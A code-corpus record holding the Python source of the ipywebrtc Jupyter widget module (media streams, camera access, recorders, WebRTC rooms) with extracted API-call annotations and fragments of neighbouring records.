'"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2535, 2570), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2815, 2860), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""non_rfc_auth"""'], {}), "('http_auth_detect', 'non_rfc_auth')\n", (2824, 2860), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((2895, 2939), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (2904, 2939), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((3278, 3315), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""auth"""'], {}), "('http_auth_detect', 'auth')\n", (3287, 3315), True, 'import w3af.core.data.kb.knowledge_base as kb\n'), ((3350, 3394), 'w3af.core.data.kb.knowledge_base.kb.get', 'kb.kb.get', (['"""http_auth_detect"""', '"""userPassUri"""'], {}), "('http_auth_detect', 'userPassUri')\n", (3359, 3394), True, 'import w3af.core.data.kb.knowledge_base as kb\n')] |
from __future__ import absolute_import
import os
import logging
try:
from urllib import urlopen # py2
except ImportError:
from urllib.request import urlopen # py3
from traitlets import (
observe,
Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate
)
from ipywidgets import DOMWidget, Image, register, widget_serialization
from ipython_genutils.py3compat import string_types
import ipywebrtc._version
import traitlets
import ipywidgets as widgets
logger = logging.getLogger("jupyter-webrtc")
semver_range_frontend = "~" + ipywebrtc._version.__version_js__
@register
class MediaStream(DOMWidget):
"""Represents a media source.
See https://developer.mozilla.org/nl/docs/Web/API/MediaStream for details
In practice this can a stream coming from an HTMLVideoElement,
HTMLCanvasElement (could be a WebGL canvas) or a camera/webcam/microphone
using getUserMedia.
"""
_model_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_name = Unicode('MediaStreamView').tag(sync=True)
_model_name = Unicode('MediaStreamModel').tag(sync=True)
_view_module_version = Unicode(semver_range_frontend).tag(sync=True)
_model_module_version = Unicode(semver_range_frontend).tag(sync=True)
# for backwards compatibility with ipyvolume
HasStream = MediaStream
@register
class WidgetStream(MediaStream):
"""Represents a widget media source.
"""
_model_name = Unicode('WidgetStreamModel').tag(sync=True)
_view_name = Unicode('WidgetStreamView').tag(sync=True)
widget = Instance(DOMWidget, allow_none=False).tag(sync=True, **widget_serialization)
max_fps = Int(None, allow_none=True).tag(sync=True)
@validate('max_fps')
def _valid_fps(self, proposal):
if proposal['value'] is not None and proposal['value'] < 0:
raise TraitError('max_fps attribute must be a positive integer')
return proposal['value']
class ImageStream(MediaStream):
"""Represent a media stream by a static image"""
_model_name = Unicode('ImageStreamModel').tag(sync=True)
image = Instance(Image).tag(sync=True, **widget_serialization)
@register
class VideoStream(MediaStream):
"""Represents a media source by a video.
The `value` of this widget accepts a byte string. The byte string is the
raw video data that you want the browser to display. You can explicitly
define the format of the byte string using the `format` trait (which
defaults to 'mp4').
If you pass `"url"` to the `"format"` trait, `value` will be interpreted
as a URL as bytes encoded in ascii.
"""
_model_name = Unicode('VideoStreamModel').tag(sync=True)
format = Unicode('mp4', help="The format of the video.").tag(sync=True)
value = Bytes(None, allow_none=True, help="The video data as a byte string.").tag(sync=True)
play = Bool(True, help='Play video or pause it').tag(sync=True)
loop = Bool(True, help='When true, the video will start from the beginning after finishing').tag(sync=True)
@classmethod
def from_file(cls, f, **kwargs):
"""Create a `VideoStream` from a local file or file object.
Parameters
----------
f: str or file
The path or file object that will be read and its bytes assigned
to the value trait.
**kwargs:
Extra keyword arguments for `VideoStream`
Returns an `VideoStream` with the value set from the content of a file.
"""
if isinstance(f, string_types):
with open(f, 'rb') as f:
return cls(value=f.read(), **kwargs)
else:
if 'format' not in kwargs:
ext = os.path.splitext(f)[1]
if ext:
kwargs['format'] = ext[1:] # remove the .
return cls(value=f.read(), **kwargs)
@classmethod
def from_url(cls, url, **kwargs):
"""Create a `VideoStream` from a url.
This wil set the .value trait to the url, and the .format trait to
'url'
Parameters
----------
url: str
The url of the file that will be assigned to the value trait.
**kwargs:
Extra keyword arguments for `VideoStream`
Returns an `VideoStream` with the value set to the url.
"""
kwargs = dict(kwargs)
kwargs['format'] = 'url'
# for now we only support ascii
return cls(value=url.encode('ascii'), **kwargs)
@classmethod
def from_download(cls, url, **kwargs):
"""Create a `VideoStream` from a url by downloading
Parameters
----------
url: str
The url of the file that will be downloadeded and its bytes
assigned to the value trait.
**kwargs:
Extra keyword arguments for `VideoStream`
Returns an `VideoStream` with the value set from the content of a url.
"""
if 'format' not in kwargs:
ext = os.path.splitext(url)[1]
if ext:
kwargs = dict(kwargs)
kwargs['format'] = ext[1:] # remove the .
return cls(value=urlopen(url).read(), **kwargs)
@register
class CameraStream(MediaStream):
"""Represents a media source by a camera/webcam/microphone using
getUserMedia. See
https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia
for more detail.
The constraints trait can be set to specify constraints for the camera or
microphone, which is described in the documentation of getUserMedia, such
as in the link above,
Two convenience methods are avaiable to easily get access to the 'front'
and 'back' camera, when present
>>> CameraStream.facing_user(audio=False)
>>> CameraStream.facing_environment(audio=False)
"""
_model_name = Unicode('CameraStreamModel').tag(sync=True)
# Specify audio constraint and video constraint
# see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia
constraints = Dict(
{'audio': True, 'video': True},
help='Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details'
).tag(sync=True)
@classmethod
def facing_user(cls, audio=True, **kwargs):
"""Convenience method to get the camera facing the user (often front)
Parameters
----------
audio: bool
Capture audio or not
kwargs:
Extra keyword arguments passed to the `CameraStream`
"""
return cls._facing(facing_mode='user', audio=audio, **kwargs)
@classmethod
def facing_environment(cls, audio=True, **kwargs):
"""Convenience method to get the camera facing the environment (often the back)
Parameters
----------
audio: bool
Capture audio or not
kwargs:
Extra keyword arguments passed to the `CameraStream`
"""
return cls._facing(facing_mode='environment', audio=audio, **kwargs)
@staticmethod
def _facing(facing_mode, audio=True, **kwargs):
kwargs = dict(kwargs)
constraints = kwargs.pop('constraints', {})
if 'audio' not in constraints:
constraints['audio'] = audio
if 'video' not in constraints:
constraints['video'] = {}
constraints['video']['facingMode'] = facing_mode
return CameraStream(constraints=constraints, **kwargs)
def _memoryview_to_bytes(value, widget=None):
return bytes(value)
@register
class MediaRecorder(DOMWidget):
"""Creates a recorder which allows to record a MediaStream widget, play the
record in the Notebook, and download it.
"""
_model_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_module = Unicode('jupyter-webrtc').tag(sync=True)
_model_name = Unicode('MediaRecorderModel').tag(sync=True)
_view_name = Unicode('MediaRecorderView').tag(sync=True)
_view_module_version = Unicode(semver_range_frontend).tag(sync=True)
_model_module_version = Unicode(semver_range_frontend).tag(sync=True)
stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
data = Bytes(help="The video data as a byte string.").tag(sync=True, from_json=_memoryview_to_bytes)
filename = Unicode('recording').tag(sync=True)
format = Unicode('webm').tag(sync=True)
record = Bool(False).tag(sync=True)
autosave = Bool(False).tag(sync=True)
@observe('data')
def _check_autosave(self, change):
if len(self.data) and self.autosave:
self.save()
def play(self):
self.send({'msg': 'play'})
def download(self):
self.send({'msg': 'download'})
def save(self, filename=None):
filename = filename or self.filename
if '.' not in filename:
filename += '.' + self.format
if len(self.data) == 0:
raise ValueError('No data, did you record anything?')
with open(filename, 'wb') as f:
f.write(self.data)
_video_src = Unicode('').tag(sync=True)
# monkey patch, same as https://github.com/jupyter-widgets/ipywidgets/pull/2146
if 'from_json' not in widgets.Image.value.metadata:
widgets.Image.value.metadata['from_json'] = lambda js, obj: None if js is None else js.tobytes()
@register
class MediaImageRecorder(DOMWidget):
"""Creates a recorder which allows to grab an Image from a MediaStream widget.
"""
_model_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_module = Unicode('jupyter-webrtc').tag(sync=True)
_model_name = Unicode('MediaImageRecorderModel').tag(sync=True)
_view_name = Unicode('MediaImageRecorderView').tag(sync=True)
_view_module_version = Unicode(semver_range_frontend).tag(sync=True)
_model_module_version = Unicode(semver_range_frontend).tag(sync=True)
stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
image = Instance(Image, allow_none=True).tag(sync=True, **widget_serialization)
filename = Unicode('recording').tag(sync=True)
autosave = Bool(False)
def __init__(self, **kwargs):
super(MediaImageRecorder, self).__init__(**kwargs)
self.image.observe(self._check_autosave, 'value')
@observe('image')
def _bind_image(self, change):
if change.old:
change.old.unobserve(self._check_autosave, 'value')
change.new.observe(self._check_autosave, 'value')
def _check_autosave(self, change):
if len(self.image.value) and self.autosave:
self.save()
@traitlets.default('image')
def _default_image(self):
return Image()
def grab(self):
self.send({'msg': 'grab'})
def download(self):
self.send({'msg': 'download'})
def save(self, filename=None):
filename = filename or self.filename
if '.' not in filename:
filename += '.' + self.image.format
if len(self.image.value) == 0:
raise ValueError('No data, did you record anything?')
with open(filename, 'wb') as f:
f.write(self.image.value)
@register
class WebRTCPeer(DOMWidget):
_model_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_name = Unicode('WebRTCPeerView').tag(sync=True)
_model_name = Unicode('WebRTCPeerModel').tag(sync=True)
_view_module_version = Unicode(semver_range_frontend).tag(sync=True)
_model_module_version = Unicode(semver_range_frontend).tag(sync=True)
stream_local = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
stream_remote = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
id_local = Unicode('').tag(sync=True)
id_remote = Unicode('').tag(sync=True)
connected = Bool(False, read_only=True).tag(sync=True)
failed = Bool(False, read_only=True).tag(sync=True)
def connect(self):
self.send({'msg': 'connect'})
@register
class WebRTCRoom(DOMWidget):
_model_module = Unicode('jupyter-webrtc').tag(sync=True)
_view_module = Unicode('jupyter-webrtc').tag(sync=True)
_model_name = Unicode('WebRTCRoomModel').tag(sync=True)
_view_module_version = Unicode(semver_range_frontend).tag(sync=True)
_model_module_version = Unicode(semver_range_frontend).tag(sync=True)
room = Unicode('room').tag(sync=True)
stream = Instance(MediaStream, allow_none=True).tag(sync=True, **widget_serialization)
id = Unicode(read_only=True).tag(sync=True)
nickname = Unicode('anonymous').tag(sync=True)
peers = List(Instance(WebRTCPeer), [], allow_none=False).tag(sync=True, **widget_serialization)
streams = List(Instance(MediaStream), [], allow_none=False).tag(sync=True, **widget_serialization)
@register
class WebRTCRoomLocal(WebRTCRoom):
_model_name = Unicode('WebRTCRoomLocalModel').tag(sync=True)
@register
class WebRTCRoomMqtt(WebRTCRoom):
_model_name = Unicode('WebRTCRoomMqttModel').tag(sync=True)
server = Unicode('wss://iot.eclipse.org:443/ws').tag(sync=True)
| [
"logging.getLogger",
"traitlets.Unicode",
"traitlets.Bytes",
"traitlets.default",
"traitlets.Dict",
"traitlets.Instance",
"os.path.splitext",
"traitlets.observe",
"traitlets.TraitError",
"traitlets.validate",
"traitlets.Int",
"ipywidgets.Image",
"urllib.request.urlopen",
"traitlets.Bool"
] | [((492, 527), 'logging.getLogger', 'logging.getLogger', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (509, 527), False, 'import logging\n'), ((1752, 1771), 'traitlets.validate', 'validate', (['"""max_fps"""'], {}), "('max_fps')\n", (1760, 1771), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8571, 8586), 'traitlets.observe', 'observe', (['"""data"""'], {}), "('data')\n", (8578, 8586), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10204, 10215), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (10208, 10215), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10374, 10390), 'traitlets.observe', 'observe', (['"""image"""'], {}), "('image')\n", (10381, 10390), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10693, 10719), 'traitlets.default', 'traitlets.default', (['"""image"""'], {}), "('image')\n", (10710, 10719), False, 'import traitlets\n'), ((10765, 10772), 'ipywidgets.Image', 'Image', ([], {}), '()\n', (10770, 10772), False, 'from ipywidgets import DOMWidget, Image, register, widget_serialization\n'), ((945, 970), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (952, 970), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1005, 1030), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (1012, 1030), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1063, 1089), 'traitlets.Unicode', 'Unicode', (['"""MediaStreamView"""'], {}), "('MediaStreamView')\n", (1070, 1089), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1123, 1150), 'traitlets.Unicode', 'Unicode', (['"""MediaStreamModel"""'], {}), "('MediaStreamModel')\n", (1130, 1150), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1193, 1223), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (1200, 1223), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1267, 1297), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (1274, 1297), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1495, 1523), 'traitlets.Unicode', 'Unicode', (['"""WidgetStreamModel"""'], {}), "('WidgetStreamModel')\n", (1502, 1523), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1556, 1583), 'traitlets.Unicode', 'Unicode', (['"""WidgetStreamView"""'], {}), "('WidgetStreamView')\n", (1563, 1583), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1613, 1650), 'traitlets.Instance', 'Instance', (['DOMWidget'], {'allow_none': '(False)'}), '(DOMWidget, allow_none=False)\n', (1621, 1650), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1704, 1730), 'traitlets.Int', 'Int', (['None'], {'allow_none': '(True)'}), '(None, allow_none=True)\n', (1707, 1730), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((1894, 1952), 'traitlets.TraitError', 'TraitError', (['"""max_fps attribute must be a positive integer"""'], {}), "('max_fps attribute must be a positive integer')\n", (1904, 1952), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2091, 2118), 'traitlets.Unicode', 'Unicode', (['"""ImageStreamModel"""'], {}), "('ImageStreamModel')\n", (2098, 2118), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2147, 2162), 'traitlets.Instance', 'Instance', (['Image'], {}), '(Image)\n', (2155, 2162), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2686, 2713), 'traitlets.Unicode', 'Unicode', (['"""VideoStreamModel"""'], {}), "('VideoStreamModel')\n", (2693, 2713), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2743, 2790), 'traitlets.Unicode', 'Unicode', (['"""mp4"""'], {'help': '"""The format of the video."""'}), "('mp4', help='The format of the video.')\n", (2750, 2790), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2818, 2887), 'traitlets.Bytes', 'Bytes', (['None'], {'allow_none': '(True)', 'help': '"""The video data as a byte string."""'}), "(None, allow_none=True, help='The video data as a byte string.')\n", (2823, 2887), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2914, 2955), 'traitlets.Bool', 'Bool', (['(True)'], {'help': '"""Play video or pause it"""'}), "(True, help='Play video or pause it')\n", (2918, 2955), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((2982, 3072), 'traitlets.Bool', 'Bool', (['(True)'], {'help': '"""When true, the video will start from the beginning after finishing"""'}), "(True, help=\n 'When true, the video will start from the beginning after finishing')\n", (2986, 3072), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((5893, 5921), 'traitlets.Unicode', 'Unicode', (['"""CameraStreamModel"""'], {}), "('CameraStreamModel')\n", (5900, 5921), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((6093, 6266), 'traitlets.Dict', 'Dict', (["{'audio': True, 'video': True}"], {'help': '"""Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details"""'}), "({'audio': True, 'video': True}, help=\n 'Constraints for the camera, see https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia for details'\n )\n", (6097, 6266), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7819, 7844), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (7826, 7844), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7879, 7904), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (7886, 7904), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((7938, 7967), 'traitlets.Unicode', 'Unicode', (['"""MediaRecorderModel"""'], {}), "('MediaRecorderModel')\n", (7945, 7967), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8000, 8028), 'traitlets.Unicode', 'Unicode', (['"""MediaRecorderView"""'], {}), "('MediaRecorderView')\n", (8007, 8028), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8071, 8101), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (8078, 8101), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8145, 8175), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (8152, 8175), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8205, 8243), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (8213, 8243), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8294, 8340), 'traitlets.Bytes', 'Bytes', ([], {'help': '"""The video data as a byte string."""'}), "(help='The video data as a byte string.')\n", (8299, 8340), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8403, 8423), 'traitlets.Unicode', 'Unicode', (['"""recording"""'], {}), "('recording')\n", (8410, 8423), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8452, 8467), 'traitlets.Unicode', 'Unicode', (['"""webm"""'], {}), "('webm')\n", (8459, 8467), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8496, 8507), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (8500, 8507), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((8538, 8549), 'traitlets.Bool', 'Bool', (['(False)'], {}), '(False)\n', (8542, 8549), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9158, 9169), 'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (9165, 9169), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9580, 9605), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (9587, 9605), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9640, 9665), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (9647, 9665), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9699, 9733), 'traitlets.Unicode', 'Unicode', (['"""MediaImageRecorderModel"""'], {}), "('MediaImageRecorderModel')\n", (9706, 9733), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9766, 9799), 'traitlets.Unicode', 'Unicode', (['"""MediaImageRecorderView"""'], {}), "('MediaImageRecorderView')\n", (9773, 9799), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9842, 9872), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (9849, 9872), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9916, 9946), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (9923, 9946), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((9976, 10014), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (9984, 10014), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10066, 10098), 'traitlets.Instance', 'Instance', (['Image'], {'allow_none': '(True)'}), '(Image, allow_none=True)\n', (10074, 10098), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((10153, 10173), 'traitlets.Unicode', 'Unicode', (['"""recording"""'], {}), "('recording')\n", (10160, 10173), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11298, 11323), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (11305, 11323), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11358, 11383), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (11365, 11383), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11416, 11441), 'traitlets.Unicode', 'Unicode', (['"""WebRTCPeerView"""'], {}), "('WebRTCPeerView')\n", (11423, 11441), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11475, 11501), 'traitlets.Unicode', 'Unicode', (['"""WebRTCPeerModel"""'], {}), "('WebRTCPeerModel')\n", (11482, 11501), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11544, 11574), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (11551, 11574), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11618, 11648), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (11625, 11648), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11684, 11722), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (11692, 11722), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11782, 11820), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (11790, 11820), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11875, 11886), 'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (11882, 11886), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11918, 11929), 'traitlets.Unicode', 'Unicode', (['""""""'], {}), "('')\n", (11925, 11929), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((11961, 11988), 'traitlets.Bool', 'Bool', (['(False)'], {'read_only': '(True)'}), '(False, read_only=True)\n', (11965, 11988), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12017, 12044), 'traitlets.Bool', 'Bool', (['(False)'], {'read_only': '(True)'}), '(False, read_only=True)\n', (12021, 12044), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12183, 12208), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (12190, 12208), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12243, 12268), 'traitlets.Unicode', 'Unicode', (['"""jupyter-webrtc"""'], {}), "('jupyter-webrtc')\n", (12250, 12268), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12302, 12328), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomModel"""'], {}), "('WebRTCRoomModel')\n", (12309, 12328), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12371, 12401), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (12378, 12401), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12445, 12475), 'traitlets.Unicode', 'Unicode', (['semver_range_frontend'], {}), '(semver_range_frontend)\n', (12452, 12475), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12503, 12518), 'traitlets.Unicode', 'Unicode', (['"""room"""'], {}), "('room')\n", (12510, 12518), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12547, 12585), 'traitlets.Instance', 'Instance', (['MediaStream'], {'allow_none': '(True)'}), '(MediaStream, allow_none=True)\n', (12555, 12585), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12634, 12657), 'traitlets.Unicode', 'Unicode', ([], {'read_only': '(True)'}), '(read_only=True)\n', (12641, 12657), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12688, 12708), 'traitlets.Unicode', 'Unicode', (['"""anonymous"""'], {}), "('anonymous')\n", (12695, 12708), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12992, 13023), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomLocalModel"""'], {}), "('WebRTCRoomLocalModel')\n", (12999, 13023), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((13103, 13133), 'traitlets.Unicode', 'Unicode', (['"""WebRTCRoomMqttModel"""'], {}), "('WebRTCRoomMqttModel')\n", (13110, 13133), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((13163, 13202), 'traitlets.Unicode', 'Unicode', (['"""wss://iot.eclipse.org:443/ws"""'], {}), "('wss://iot.eclipse.org:443/ws')\n", (13170, 13202), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((5039, 5060), 'os.path.splitext', 'os.path.splitext', (['url'], {}), '(url)\n', (5055, 5060), False, 'import os\n'), ((12741, 12761), 'traitlets.Instance', 'Instance', (['WebRTCPeer'], {}), '(WebRTCPeer)\n', (12749, 12761), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((12843, 12864), 'traitlets.Instance', 'Instance', (['MediaStream'], {}), '(MediaStream)\n', (12851, 12864), False, 'from traitlets import observe, Bool, Bytes, Dict, Instance, Int, List, TraitError, Unicode, validate\n'), ((3746, 3765), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (3762, 3765), False, 'import os\n'), ((5206, 5218), 'urllib.request.urlopen', 'urlopen', (['url'], {}), '(url)\n', (5213, 5218), False, 'from urllib.request import urlopen\n')] |
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*(testing.product({
'batchsize': [1, 5],
'size': [10, 20],
'dtype': [numpy.float32],
'eps': [1e-5, 1e-1],
})))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
